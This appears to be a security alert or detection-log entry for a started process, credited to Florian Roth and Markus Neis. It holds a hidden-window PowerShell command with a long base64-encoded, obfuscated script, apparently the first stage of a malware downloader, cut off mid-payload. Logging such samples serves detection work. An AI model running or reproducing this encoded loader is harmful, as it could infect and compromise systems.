                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQ